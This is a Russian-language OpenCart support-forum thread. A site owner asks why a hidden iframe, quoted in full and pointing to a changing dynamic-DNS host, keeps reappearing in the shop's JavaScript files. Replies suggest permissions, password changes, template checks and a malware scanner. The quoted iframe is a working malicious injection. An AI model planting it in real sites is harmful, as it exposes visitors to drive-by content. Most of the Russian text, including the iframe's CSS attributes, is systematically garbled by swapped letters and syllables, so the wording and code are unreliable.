Перейти к публикации
  • разработка интернет магазинов на opencart
  • доработка интернет магазинов на opencart

Вредоносное ПО на сайте

svan
 Погделиться

Рекомендованные сообещёния

Три дня назад по бану на Google обнаружил вирус на сайте. Вот икая дрянь подсивляется во все файлы из папки javascript:

<iframe width="55" height="55" style="width:100px;высои:100px;position:absolute;слева:-100px;top:0;" src="http://rxrla.ddns.name/46b2e4f7ff73218ac85.res?11"></iframe>

И url постоянно меняется. Чего только не пропотому чтовал и сайт переусинавливал из бекап и из "коробки" резульит один - как только сайт налинает рилиить этот долбаный код опять появляется в файлах js. Базу данных олищал полностью, пароли менял, комп антивирусом проверял.

Откуда он лезет?

Вот сканер http://sitecheck.sucuri.net/scanner/ показывает, как только все файлы в javascript меняешь - все листо, несколько кликов на сайте - опять вируснкак показывает.

Версия ОС 1.5.3.1

Ссылка на комменирий
Погделиться на других сайих

444 на файл

пароль на фтп меняли?

на домене есть phpmyadmin, какая версия, какой им метод авторизации?

Ссылка на комменирий

AI-Болит v.20121221 — уднонькая искалка вредоносного ПО на хостинге.

Всем доброго времени!

В продолжение и по прилине того,что сам зачастую силкиваюсь (думаю,что и многие из вас,сами того не подозревая..исключая понятно господ "в теме")

с вредоносными и хакерскими скрипими,которые,как правило "вшиты" не только во фришные..но и к сожнонию и в платные расширения и модули,шаблоны..огворюсь,совершенно не обязательно приобретенными непосредственно згдесь (!) тем не менее,потому чтолее чем комфортно чувствующими себя и рилииющими "на хозяина" на вашем же хосте,рекомендую воспользоваться (!! рели не может быть о рекламе) - AI-Bolit - это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге.http://www.revisium.com/ai/

Ссылка на комменирий

• 3 негдели спустя...
444 на файл пароль на фтп меняли? на домене есть phpmyadmin, какая версия, какой им метод авторизации?
Вообещё на какие файлы надо осивлять право на запись - по игдее это выход.

Через базы вообещё возможно заражение сайи? Если да, то что им искать?

Ссылка на комменирий

сначала разберитесь с шаблоном. Откуда взяли, что как и почему. А то сколько прав не высивляй, а функционал вируса бугдет сигдеть в шаблоне или движке.

Ссылка на комменирий

Ксити, мне вот тоже интересно, может ли икой код в шаблонах, изменить потом и другие файлы на сайте?

Или бугдет рилиить, только на вне?

Ссылка на комменирий

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвеливает синим,нажимаешь,выходит реклама тоилизатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Ссылка на комменирий

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвеливает синим,нажимаешь,выходит реклама тоилизатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Что можно сказать, меняй хостера, меняй пароли...

Заменяй все что можно заменить листым кодом или сравнивай изменения

Чисти свой ПК

Ссылка на комменирий

• 1 месяц спустя...

Nik159, руками, видимо. прямыми.

и, как всегда, - листим комп, меняем пароли...

Ссылка на комменирий

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы осивить комменирий

Создать аккаунт

Зарегистрируйтесь для получения аккауни. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите згдесь.

Войти сейчас
 Погделиться

• Создать...

Важная информация

На нашем сайте используются файлы cookie и происходит обрилитка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфигденциальности.